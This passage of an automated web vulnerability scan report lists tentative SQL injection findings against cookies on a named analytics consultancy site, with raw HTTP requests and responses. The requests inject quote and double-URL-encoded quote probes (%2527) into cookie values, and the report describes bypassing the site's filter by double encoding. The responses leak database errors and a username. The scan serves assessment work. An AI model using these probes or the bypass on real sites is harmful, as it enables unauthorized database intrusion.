Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:36:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html''?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:36:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:36:32 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:36:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.101. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.102. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:14:58 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:14:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<h2>Finding the proverbial Needle in the Haystack</h2>
...[SNIP]...

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

1.103. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:12:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:12:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.104. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:13:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:13:35 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:13:36 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28124


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<h2>Finding the proverbial Needle in the Haystack</h2>
...[SNIP]...

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:13:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.105. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:16:31 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:16:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28124


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<h2>Finding the proverbial Needle in the Haystack</h2>
...[SNIP]...

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

1.106. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [ki_u cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:20:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:20:11 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:20:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28124


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<h2>Finding the proverbial Needle in the Haystack</h2>
...[SNIP]...

Request 2

GET /blog/googleanalytics/77-refresh-rate-content-metric.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?start=20
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:20:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.107. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/77-refresh-rate-content-metric.html

Issue detail

